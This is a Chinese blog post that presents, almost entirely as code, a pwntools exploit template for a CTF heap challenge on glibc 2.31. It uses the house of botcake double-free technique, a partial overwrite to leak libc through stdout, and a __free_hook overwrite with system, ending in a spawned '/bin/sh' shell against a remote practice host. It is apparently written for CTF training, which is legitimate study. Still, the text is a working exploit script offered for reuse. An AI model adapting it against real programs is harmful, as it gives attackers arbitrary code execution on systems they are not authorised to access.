house of botcake利用模板+爆破stdout泄露地址 glibc2.31

thna0s

已于 2022-11-12 20:03:37 修改

阅读量158

点赞数

分类专栏：堆利用模板文章标签：网络安全

于 2022-11-06 19:45:00 首次发布

本文链接：https://blog.csdn.net/FUCKING12/article/details/127719927

版权

堆利用模板专栏收录该内容

4 篇文章 1 订阅

订阅专栏

from pwn import *
context.update(os='linux',arch='amd64',log_level='debug')
#c=remote(b'node4.buuoj.cn',25937)
# c=process(b'./pwn1')
libc=ELF(b'/pwn/libc')


#def dbg():
#	gdb.attach(c,'''


#	b *$rebase(0x14a1)
#	b *$rebase(0x14f9)
#	b *$rebase(0x15d7)
#	b *$rebase(0x1684)
#
#
#	''')
def dbg():
    gdb.attach(c)
    pause()


def add(size,content):
	c.sendlineafter(b'choice : ',b'1')
	c.sendafter(b'Size: ',str(size))
	c.sendafter(b'Content: ',content)
	
	
	
	
def free(idx):
	c.sendlineafter(b'choice : ',b'2')
	c.sendlineafter(b'dex: ',str(idx))
	
	
def luck_free(idx):
	c.sendlineafter(b'choice : ',b'9')
	c.sendlineafter(b'dex: ',str(idx))
	

def run():
	
###### house of botcake	
	
	for i in range(7):
		add(0x80,b'a')	#0-6


	add(0x80,b'a')	#7
	add(0x80,b'a')	#8
	add(0x80,b'a')	#9


	for i in range(7):
		free(i)



	luck_free(8)
	free(7)
	add(0x80,b'a')	#10
	free(8)


###### 

	add(0x50,p16(0x2690))	#11,_IO_2_1_stderr-0x43+0x10 p16(0x266d)
	# dbg()

	py=b'a'*0x20+p64(0)+p64(0x91)+p16(0xf690)#p16(0xc690)
	add(0x40,py)	#12

	# dbg()

	add(0x80,b'a')	#13
	add(0x80,b'a')	#14
	# dbg()

	add(0x80,b'a'*0x10+p64(0xfbad1800)+p64(0)*3+b'\x00')	#15
	# dbg()


	libc_base=u64(c.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-libc.sym['_IO_2_1_stdin_']

	log.success("libc_base="+hex(libc_base))



######
	# dbg()

	free(13)
	free(12)
	# dbg()

	free_hook=libc_base+libc.sym['__free_hook']
	sys=libc_base+libc.sym['system']
	log.success("system="+hex(sys))

	add(0x40,b'a'*0x20+p64(0)+p64(0x91)+p64(free_hook))	#16
	# dbg()

	add(0x80,b'/bin/sh\x00')	#17
	add(0x80,p64(sys))	#18
	# dbg()

	free(17)
	# dbg()

	c.interactive()

# if __name__=='__main__':
# 	while True:
# 		# c=process('./pwn1')
# 		c=remote('node4.buuoj.cn',28264)
# 		try:
# 			run()
# 		except:
# 			c.close()
run()